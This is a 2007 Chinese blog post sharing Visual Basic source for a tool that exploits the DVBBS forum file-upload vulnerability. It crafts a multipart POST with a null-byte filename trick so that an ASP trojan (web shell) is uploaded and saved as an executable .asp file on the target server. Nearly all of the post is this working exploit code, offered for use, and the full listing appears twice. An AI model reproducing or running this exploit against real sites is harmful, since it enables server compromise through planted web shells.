上一篇
下一篇
DVBBS文件上传漏洞利用工具源代码
作者:JiaJia 日期:2007-07-11
有人需要,顺便丢上来咯~很早以前的东西咯!
这个是以前动网文件上传漏洞刚出来的时候写的一个利用工具。纯粹是熟悉下VB编程。
引用内容:
Option Explicit
Dim info1 As String
Dim info2 As String
Dim length As Integer
Private Sub Command1_Click()
If Me.Height = 5010 Then
Me.Height = 7635
End If
If Text5.Text = "" Then
MsgBox "看你急的,连ASP木马也没放进去。还不快放个进去!", vbExclamation + vbOKOnly, "友情提示:)"
End If
info2 = "" '====================这里的变量如果不清空的话,后面测试数据长度的地方会出错====
Winsock1.Close
Winsock1.RemoteHost = Text1.Text
Winsock1.RemotePort = Text2.Text
Winsock1.Connect
End Sub
Private Sub Command2_Click()
End
End Sub
Private Sub Form_Load()
Me.Height = 5010
Me.Width = 4410
Text1.Text = "www.yulv.net"
Text2.Text = "80"
Text3.Text = "/dvbbs/upfile.asp"
Text4.Text = "uploadface/mm.asp"
'Text5.Text = ""
Text6.Text = ""
Text7.Text = "/dvbbs/reg_upload.asp"
End Sub
Private Sub Winsock1_Connect()
'===================info1和info2两个变量就是抓包抓到的2条记录==================
On Error Resume Next
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "filepath" + Chr(34) + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + Text4.Text + Chr(0) + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "act" + Chr(34) + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "upload" + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
'==================这里的chr(34)表示双引号====================================
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "file1" + Chr(34) + "; filename=" + Chr(34) + "C:\bjsdfzlt.gif" + Chr(34) + vbCrLf
info2 = info2 + "Content-Type: text/plain" + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + Text5.Text + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "fname" + Chr(34) + vbCrLf
'info2 = info2 + Text5.Text + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "C:\bjsdfzlt.asp" + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "Submit" + Chr(34) + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "上传" + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4--" + vbCrLf
length = LenB(StrConv(info2, vbFromUnicode)) '==================这里控制数据的长度==========
info1 = "POST" + " " + Text3.Text + " " + "HTTP/1.1" + vbCrLf
info1 = info1 + "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*" + vbCrLf
info1 = info1 + "Referer: http://"+Text1.Text+Text7.Text+vbCrLf
info1 = info1 + "Accept-Language: zh-cn" + vbCrLf
info1 = info1 + "Content-Type: multipart/form-data; boundary=---------------------------7d411939702a4" + vbCrLf
info1 = info1 + "Accept-Encoding: gzip, deflate" + vbCrLf
info1 = info1 + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + vbCrLf
info1 = info1 + "Host: " + Text1.Text + vbCrLf
info1 = info1 + "Content-Length:" + CStr(length) + vbCrLf
info1 = info1 + "Connection: Keep-Alive" + vbCrLf
info1 = info1 + "Cache-Control: no-cache" + vbCrLf
info1 = info1 + "Cookie: iscookies=0" + vbCrLf
info1 = info1 + vbCrLf
info1 = info1 + info2 + vbCrLf
Winsock1.SendData info1 '提交数据,相当于nc.exe提交
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim strvalue As String
Winsock1.GetData strvalue
Text6.Text = strvalue + vbCrLf
End Sub
这个是以前动网文件上传漏洞刚出来的时候写的一个利用工具。纯粹是熟悉下VB编程。
引用内容:
Option Explicit
Dim info1 As String
Dim info2 As String
Dim length As Integer
Private Sub Command1_Click()
If Me.Height = 5010 Then
Me.Height = 7635
End If
If Text5.Text = "" Then
MsgBox "看你急的,连ASP木马也没放进去。还不快放个进去!", vbExclamation + vbOKOnly, "友情提示:)"
End If
info2 = "" '====================这里的变量如果不清空的话,后面测试数据长度的地方会出错====
Winsock1.Close
Winsock1.RemoteHost = Text1.Text
Winsock1.RemotePort = Text2.Text
Winsock1.Connect
End Sub
Private Sub Command2_Click()
End
End Sub
Private Sub Form_Load()
Me.Height = 5010
Me.Width = 4410
Text1.Text = "www.yulv.net"
Text2.Text = "80"
Text3.Text = "/dvbbs/upfile.asp"
Text4.Text = "uploadface/mm.asp"
'Text5.Text = ""
Text6.Text = ""
Text7.Text = "/dvbbs/reg_upload.asp"
End Sub
Private Sub Winsock1_Connect()
'===================info1和info2两个变量就是抓包抓到的2条记录==================
On Error Resume Next
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "filepath" + Chr(34) + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + Text4.Text + Chr(0) + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "act" + Chr(34) + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "upload" + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
'==================这里的chr(34)表示双引号====================================
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "file1" + Chr(34) + "; filename=" + Chr(34) + "C:\bjsdfzlt.gif" + Chr(34) + vbCrLf
info2 = info2 + "Content-Type: text/plain" + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + Text5.Text + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "fname" + Chr(34) + vbCrLf
'info2 = info2 + Text5.Text + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "C:\bjsdfzlt.asp" + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4" + vbCrLf
info2 = info2 + "Content-Disposition: form-data; name=" + Chr(34) + "Submit" + Chr(34) + vbCrLf
info2 = info2 + vbCrLf
info2 = info2 + "上传" + vbCrLf
info2 = info2 + "-----------------------------7d411939702a4--" + vbCrLf
length = LenB(StrConv(info2, vbFromUnicode)) '==================这里控制数据的长度==========
info1 = "POST" + " " + Text3.Text + " " + "HTTP/1.1" + vbCrLf
info1 = info1 + "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*" + vbCrLf
info1 = info1 + "Referer: http://"+Text1.Text+Text7.Text+vbCrLf
info1 = info1 + "Accept-Language: zh-cn" + vbCrLf
info1 = info1 + "Content-Type: multipart/form-data; boundary=---------------------------7d411939702a4" + vbCrLf
info1 = info1 + "Accept-Encoding: gzip, deflate" + vbCrLf
info1 = info1 + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + vbCrLf
info1 = info1 + "Host: " + Text1.Text + vbCrLf
info1 = info1 + "Content-Length:" + CStr(length) + vbCrLf
info1 = info1 + "Connection: Keep-Alive" + vbCrLf
info1 = info1 + "Cache-Control: no-cache" + vbCrLf
info1 = info1 + "Cookie: iscookies=0" + vbCrLf
info1 = info1 + vbCrLf
info1 = info1 + info2 + vbCrLf
Winsock1.SendData info1 '提交数据,相当于nc.exe提交
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim strvalue As String
Winsock1.GetData strvalue
Text6.Text = strvalue + vbCrLf
End Sub
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: -
发表评论